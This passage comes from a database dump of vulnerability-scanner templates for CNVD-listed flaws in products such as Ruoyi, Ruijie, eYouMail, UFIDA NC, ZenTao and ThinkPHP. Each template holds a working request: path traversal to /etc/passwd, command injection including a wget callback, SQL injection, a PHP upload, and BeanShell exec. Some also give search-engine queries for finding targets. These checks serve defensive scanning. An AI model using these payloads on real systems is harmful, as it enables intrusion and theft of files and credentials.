cwe-id: CWE-22\n metadata:\n max-request: 3\n tags: cnvd,cnvd2020,weiphp,lfi\n\nhttp:\n - raw:\n - |\n POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n \"1\":1\n - |\n GET /public/index.php/home/file/user_pics HTTP/1.1\n Host: {{Hostname}}\n - |\n GET {{endpoint}} HTTP/1.1\n Host: {{Hostname}}\n\n extractors:\n - type: regex\n name: endpoint\n part: body\n internal: true\n regex:\n - '/public/uploads/picture/(.*.jpg)'\n matchers:\n - type: word\n part: body\n words:\n - https://weiphp.cn\n - WeiPHP\n - DB_PREFIX\n condition: and\n# digest: 490a004630440220510a1de2daebb2a7cd068ca47f43ea4d9c42ee75ecf84d60422c38a1b62e92910220712a48b29bb2d311b699983ccc765ab83b4468a09eb60a6ff65aa71d59b18e07:922c64590222798bb761d5b6d8e72950", "hash": "3bbc20459a047fa875ad93a0987690eb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e10" }, "name": "CNVD-2021-01931.yaml", "content": "id: CNVD-2021-01931\n\ninfo:\n name: Ruoyi Management System - Local File Inclusion\n author: daffainfo,ritikchaddha\n severity: high\n description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.\n reference:\n - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cwe-id: CWE-22\n metadata:\n max-request: 2\n tags: cnvd,cnvd2021,ruoyi,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd\"\n - \"{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini\"\n\n matchers-condition: or\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0\"\n\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4a0a00473045022100e3979047134fe0ca6dd999adbf3bc63b9fd991c76bc1e85565c6ff8156e7d22b0220711ac9bdbb8a0ec31179b9da419ffd9122883f6c0fefd77a9b663e1656f8d5ec:922c64590222798bb761d5b6d8e72950", "hash": "b3384333f98dc9c3facafbca712534a5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e11" }, "name": "CNVD-2021-09650.yaml", "content": "id: CNVD-2021-09650\n\ninfo:\n name: Ruijie Networks-EWEB Network Management System - Remote Code Execution\n author: daffainfo,pikpikcu\n severity: critical\n description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.\n reference:\n - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/\n - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py\n - https://www.ruijienetworks.com\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 1\n tags: cnvd,cnvd2021,ruijie,rce\n\nhttp:\n - raw:\n - |\n POST /guest_auth/guestIsUp.php\n Host: {{Hostname}}\n\n mac=1&ip=127.0.0.1|wget {{interactsh-url}}\n\n unsafe: true\n matchers:\n - type: word\n part: interactsh_protocol\n name: http\n words:\n - \"http\"\n# digest: 490a0046304402202d6b248201cb2194c4824f5ec119cef5b993674b0ca7deb993bbb91ce2c4f4e002206eb8515733c686fabf67c25c8b5a3cb2713cf95ec51cd8e696634247b0cb688a:922c64590222798bb761d5b6d8e72950", "hash": "c22989bf81b080c321e34d729b2e79cd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e12" }, "name": "CNVD-2021-10543.yaml", "content": "id: CNVD-2021-10543\n\ninfo:\n name: EEA - Information Disclosure\n author: pikpikcu\n severity: high\n description: EEA is susceptible to information disclosure including the username and password.\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: cnvd,cnvd2021,config,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/authenticationserverservlet\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"(.*?)\"\n - \"(.*?)\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ecc765b8bba511bf3767eae8e50a444efb9c1a0e97670478282296ddb39b59b4022021e4eda9da996981443cdb0e1b6ed5d469c9ce61f93f743153294c57c8a3c3cb:922c64590222798bb761d5b6d8e72950", "hash": "3559be564b552298117307ebd6a2d5b1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e13" }, "name": "CNVD-2021-14536.yaml", "content": "id: CNVD-2021-14536\n\ninfo:\n name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure\n author: daffainfo\n severity: high\n description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.\n reference:\n - https://www.adminxe.com/2163.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n cvss-score: 8.3\n cwe-id: CWE-522\n metadata:\n max-request: 1\n fofa-query: title=\"RG-UAC登录页面\"\n tags: cnvd2021,cnvd,ruijie,disclosure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/get_dkey.php?user=admin\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"pre_define\"'\n - '\"auth_method\"'\n - '\"name\"'\n - '\"password\"'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n part: body\n group: 1\n regex:\n - '\"role\":\"super_admin\",([\"a-z:,0-9]+),\"lastpwdtime\":'\n# digest: 490a00463044022046fa27ed559165bee99e3f0591f1ca5ee488637fb236c6b1c81fe49ee2c93865022045c885a0df3ac7a1fbada587a1785a09b40212dc68eeb662117a4e7bccac59d5:922c64590222798bb761d5b6d8e72950", "hash": "477c6fe9aa37fe3acc7f98ac7e864a56", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e14" }, "name": "CNVD-2021-15822.yaml", "content": "id: CNVD-2021-15822\n\ninfo:\n name: ShopXO Download File Read\n author: pikpikcu\n severity: high\n description: |\n ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.\n reference:\n - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog\n metadata:\n verified: true\n max-request: 1\n shodan-query: title:\"ShopXO企业级B2C电商系统提供商\"\n fofa-query: app=\"ShopXO企业级B2C电商系统提供商\"\n tags: cnvd2021,cnvd,shopxo,lfi\n\nhttp:\n - raw:\n - |\n GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206735e750a62b437583ca1e1cae33666b4c2ce3b8a8310c3d1212a98fcb018a69022066c8a339f06f76b3df20a5c624b054d356f219e1e77661921c541dc2d7ee4dc5:922c64590222798bb761d5b6d8e72950", "hash": "c8457b6ec38fa90c34261be49843adf6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e15" }, "name": "CNVD-2021-15824.yaml", "content": "id: CNVD-2021-15824\n\ninfo:\n name: EmpireCMS DOM Cross Site-Scripting\n author: daffainfo\n severity: high\n description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.\n reference:\n - https://sourceforge.net/projects/empirecms/\n - https://www.bilibili.com/read/cv10441910\n - https://vul.wangan.com/a/CNVD-2021-15824\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cwe-id: CWE-79\n metadata:\n max-request: 1\n tags: cnvd2021,cnvd,empirecms,xss,domxss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'if(Request(\"url\")!=0)'\n - 'href=\\\"\"+Request(\"url\")+\"\\\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bd99bed51a9176fa2d9b166aa56e5dbf68db6cca10c27260f127129ae6b78ac102201d3585044ed11e562a6aadf90a7c422d2e85de8e1dc023be26456cfa76fbefaf:922c64590222798bb761d5b6d8e72950", "hash": "d5e755f57c39fbba56dec8670baf023c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e16" }, "name": "CNVD-2021-17369.yaml", "content": "id: CNVD-2021-17369\n\ninfo:\n name: Ruijie Smartweb Management System Password Information Disclosure\n author: pikpikcu\n severity: high\n description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege.\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n cvss-score: 8.3\n cwe-id: CWE-522\n metadata:\n max-request: 1\n tags: cnvd2021,cnvd,ruijie,disclosure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web/xml/webuser-auth.xml\"\n\n headers:\n Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100886e90d197472436d75225cc8b4cebd18cec299c739d5334b39489a60ec706a7022100e079763c5199ba85db214a9209c815bbd097a810731cad5f9d16f3db8222334b:922c64590222798bb761d5b6d8e72950", "hash": "215266e206ea6b00a7b7c26dc131d0b1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e17" }, "name": "CNVD-2021-26422.yaml", "content": "id: CNVD-2021-26422\n\ninfo:\n name: eYouMail - Remote Code Execution\n author: daffainfo\n severity: critical\n description: eYouMail is susceptible to a remote code execution vulnerability.\n reference:\n - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py\n - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 1\n tags: cnvd2021,cnvd,eyoumail,rce\n\nhttp:\n - raw:\n - |\n POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n type='|cat /etc/passwd||'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f181d46d3d2e74819331b2a4169b01efb1d42df2e201f60831c779070550f51202207ef66ae62f3d77d753c0ae17e60e999d8f75ed523804e98102f673e59b2a124c:922c64590222798bb761d5b6d8e72950", "hash": "34198feb8922f79bf95bb46bb05aab7b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e18" }, "name": "CNVD-2021-28277.yaml", "content": "id: CNVD-2021-28277\n\ninfo:\n name: Landray-OA - Local File Inclusion\n author: pikpikcu,daffainfo\n severity: high\n description: Landray-OA is susceptible to local file inclusion.\n reference:\n - https://www.aisoutu.com/a/1432457\n - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cwe-id: CWE-22\n metadata:\n max-request: 2\n fofa-query: app=\"Landray OA system\"\n tags: cnvd,cnvd2021,landray,lfi\n\nhttp:\n - raw:\n - |\n POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n var={\"body\":{\"file\":\"file:///etc/passwd\"}}\n - |\n POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n var={\"body\":{\"file\":\"file:///c://windows/win.ini\"}}\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n - \"for 16-bit app support\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b98b4479ab9f48943be02a1d2b3a0cebe9d3d5389705d58d3d7ca1f306dcdebc022100d07fed00db3b41b001193fcbaf37522bdd576917c02364b840beb62c96d46a32:922c64590222798bb761d5b6d8e72950", "hash": "0bb980283b2fc0a4d37654f4a1a2d76a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e19" }, "name": "CNVD-2021-30167.yaml", "content": "id: CNVD-2021-30167\n\ninfo:\n name: UFIDA NC BeanShell Remote Command Execution\n author: pikpikcu\n severity: critical\n description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.\n reference:\n - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A\n - https://www.cnvd.org.cn/webinfo/show/6491\n - https://chowdera.com/2022/03/202203110138271510.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 2\n tags: cnvd2021,cnvd,beanshell,rce,yonyou\n\nhttp:\n - raw:\n - | #linux\n POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n bsh.script=exec(\"id\");\n - | #windows\n POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n bsh.script=exec(\"ipconfig\");\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"uid=\"\n - \"Windows IP\"\n condition: or\n\n - type: word\n words:\n - \"BeanShell Test Servlet\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204c68147fa92e08857a6c0b79bd9fec56f4e80397bd5f67365061730b8c35507502200dab5a42e472ba22b293104ee2b265e9a14995ac4e38a11db07f2e41e599d6fa:922c64590222798bb761d5b6d8e72950", "hash": "e4edebec8328548118f771ba50712630", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1a" }, "name": "CNVD-2021-32799.yaml", "content": "id: CNVD-2021-32799\n\ninfo:\n name: 360 Xintianqing - SQL Injection\n author: SleepingBag945\n severity: high\n description: |\n The Tianqing Terminal Security Management System, designed for government and enterprise use, faces a SQL injection vulnerability. This flaw could enable attackers to access sensitive database information.\n reference:\n - https://blog.51cto.com/u_9691128/4295047\n - https://www.cnvd.org.cn/patchInfo/show/270651\n - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/CNVD/2021/CNVD-2021-32799.yaml\n metadata:\n verified: true\n max-request: 1\n fofa-query: app=\"360新天擎\"\n tags: cnvd2021,cnvd,360,xintianqing,sqli\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/api/dp/rptsvcsyncpoint?ccid=1'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"reason\":'\n - '\"success\"'\n - '\"antiadwa\":'\n - '\"clientupgrade\":'\n condition: and\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206afa5e0d4549835bc2d4c5fb006f2fce414e37201594e6248fd2f11bd4b63b68022100b8de4f954a677c82dbcdbbc13d9201237fdfada40ff00767c561af267d0c1097:922c64590222798bb761d5b6d8e72950", "hash": "fbcaf09b29e318cdce3e5218a1edf33b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1b" }, "name": "CNVD-2021-33202.yaml", "content": "id: CNVD-2021-33202\n\ninfo:\n name: OA E-Cology LoginSSO.jsp - SQL Injection\n author: SleepingBag945\n severity: high\n description: |\n e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.\n reference:\n - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md\n - https://www.cnblogs.com/0day-li/p/14637680.html\n metadata:\n verified: true\n max-request: 1\n fofa-query: app=\"泛微-协同办公OA\"\n tags: cnvd2021,cnvd,e-cology,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202c3b8ac764f980a41094f1c98193a9080c65ceaff64975f42b69ef53477bb196022100bb0b3e66abdc94f608aefecaf03255af930789468009df696c1eedb8dff2d283:922c64590222798bb761d5b6d8e72950", "hash": "e858c6a2c9a7f5686630ecfce3c8ed53", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1c" }, "name": "CNVD-2021-41972.yaml", "content": "id: CNVD-2021-41972\n\ninfo:\n name: AceNet AceReporter Report - Arbitrary File Download\n author: DhiyaneshDk\n severity: high\n description: |\n All firewall devices that use the AceNet AceReporter report component can download arbitrary files\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972\n - https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt\n metadata:\n verified: true\n max-request: 1\n shodan-query: http.favicon.hash:-1595726841\n fofa-query: body=\"Login @ Reporter\"\n tags: cnvd2021,cnvd,acenet,acereporter,lfi\nvariables:\n filename: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename={{filename}}.txt\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: word\n part: header\n words:\n - 'filename='\n - 'application/octet-stream'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b2f4c83664a3551071fd365e79502f07f19b3a4270b772692743ca3a78625e5d022100c95a9507e707152572170ea39f82bc646218bbb46f592fbad2474a04d797a37a:922c64590222798bb761d5b6d8e72950", "hash": "62d443852fb685402c2533afec60ca5b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1d" }, "name": "CNVD-2021-43984.yaml", "content": "id: CNVD-2021-43984\n\ninfo:\n name: MPSec ISG1000 Security Gateway - Arbitrary File Download\n author: DhiyaneshDk\n severity: high\n description: |\n The MPSec ISG1000 safety gateway at MP Communications Technology Co., Ltd. has any file download loophole, and attackers can use the loophole to obtain sensitive information.\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2021-43984\n - https://github.com/chaitin/xray/blob/master/pocs/mpsec-isg1000-file-read.yml\n metadata:\n verified: true\n max-request: 1\n fofa-query: \"迈普通信技术股份有限公司\"\n tags: cnvd2021,cnvd,mpsec,maipu,lfi,isg\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n - \"USGSESSID=\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cde6f299fa9dcf25f8392e07f90f53acd5a9ef19c1ad7f1dc0c0ac42932945be02205188ca41cd7dc765aeb1c0114d3d488df0f92c32fec8b211ee98aae1d79a7e54:922c64590222798bb761d5b6d8e72950", "hash": "cdc6ebef6ff7304d42420439a4b05a44", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1e" }, "name": "CNVD-2021-49104.yaml", "content": "id: CNVD-2021-49104\n\ninfo:\n name: Pan Micro E-office File Uploads\n author: pikpikcu\n severity: critical\n description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.\n remediation: Pan Wei has released an update to resolve this vulnerability.\n reference:\n - https://chowdera.com/2021/12/202112200602130067.html\n - http://v10.e-office.cn\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L\n cvss-score: 9.9\n cwe-id: CWE-434\n metadata:\n max-request: 2\n tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive\n\nhttp:\n - raw:\n - |\n POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4\n\n --e64bdf16c554bbc109cecef6451c26a4\n Content-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr}}.php\"\n Content-Type: image/jpeg\n\n \n\n --e64bdf16c554bbc109cecef6451c26a4--\n - |\n GET /images/logo/logo-eoffice.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"94d01a2324ce38a2e29a629c54190f67\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220384c6063def534ec0a814462caa5c044f86fa88e02b0a86416081f5adfd949d7022100fd2c2b727b05bfa5f1a00b106da9e0e3c523181f8d952566e32aab8e266c46db:922c64590222798bb761d5b6d8e72950", "hash": "ca8cf7738439653092d59d4973320293", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1f" }, "name": "CNVD-2022-03672.yaml", "content": "id: CNVD-2022-03672\n\ninfo:\n name: Sunflower Simple and Personal - Remote Code Execution\n author: daffainfo\n severity: critical\n description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.\n reference:\n - https://www.1024sou.com/article/741374.html\n - https://copyfuture.com/blogs-details/202202192249158884\n - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270\n - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 2\n tags: cnvd,cnvd2022,sunflower,rce\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/rpc HTTP/1.1\n Host: {{Hostname}}\n\n action=verify-haras\n - |\n GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1\n Host: {{Hostname}}\n Cookie: CID={{cid}}\n\n extractors:\n - type: regex\n name: cid\n internal: true\n group: 1\n regex:\n - '\"verify_string\":\"(.*?)\"'\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1==200\"\n - \"status_code_2==200\"\n - \"contains(body_1, 'verify_string')\"\n - \"contains(body_2, 'Windows IP')\"\n condition: and\n# digest: 4a0a004730450220390bd0f291ed6719ac99f1b99704321d1d494d765e27a461bfa4e40e2c5b1de3022100e455e5442cc085d18b9510c673ce41df4cfabc49acf8e45f5bb687cca53a4f9e:922c64590222798bb761d5b6d8e72950", "hash": "073e090300957e105aec752ded5a5621", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e20" }, "name": "CNVD-2022-42853.yaml", "content": "id: CNVD-2022-42853\n\ninfo:\n name: ZenTao CMS - SQL Injection\n author: ling\n severity: critical\n description: |\n ZenTao CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n reference:\n - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go\n - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-89\n metadata:\n verified: true\n max-request: 1\n shodan-query: http.title:\"zentao\"\n fofa-query: \"Zentao\"\n tags: cnvd,cnvd2022,zentao,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /zentao/user-login.html HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{BaseURL}}/zentao/user-login.html\n\n account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1\n\n matchers:\n - type: word\n part: body\n words:\n - 'c8c605999f3d8352d7bb792cf3fdb25'\n\n# digest: 4a0a00473045022009572d4885de4de6ef2312a58a67d6c67fefd27b962fa80a8e3864193987c66f022100e190d2836fe344522dc84ded60b1213a62631baac598ca6dd444edfff9ec535c:922c64590222798bb761d5b6d8e72950\n", "hash": "07e58f0b2941102d1ff0b69738b7f77c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e21" }, "name": "CNVD-2022-43245.yaml", "content": "id: CNVD-2022-43245\n\ninfo:\n name: Weaver OA XmlRpcServlet - Arbitary File Read\n author: SleepingBag945\n severity: high\n description: |\n e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.\n metadata:\n verified: true\n max-request: 1\n fofa-query: app=\"泛微-协同办公OA\"\n tags: cnvd,cnvd2022,weaver,e-office,oa,lfi\n\nhttp:\n - raw:\n - |\n POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n WorkflowService.getAttachment\n /etc/passwd\n \n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n\n - type: status\n status:\n - 200\n\n# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950\n", "hash": "937efb3baf291f1d4de9483562649e52", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e22" }, "name": "CNVD-2022-86535.yaml", "content": "id: CNVD-2022-86535\n\ninfo:\n name: ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE)\n author: arliya,ritikchaddha\n severity: high\n description: |\n ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.\n reference:\n - https://cn-sec.com/archives/1465289.html\n - https://blog.csdn.net/qq_60614981/article/details/128724640\n - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535\n metadata:\n verified: true\n max-request: 3\n tags: cnvd,cnvd2022,thinkphp,rce\n\nhttp:\n - raw:\n - |\n GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1\n Host: {{Hostname}}\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n think-lang: ../../../../../usr/local/php/pearcmd\n - |\n GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: or\n matchers:\n - type: word\n part: set_cookie\n words:\n - 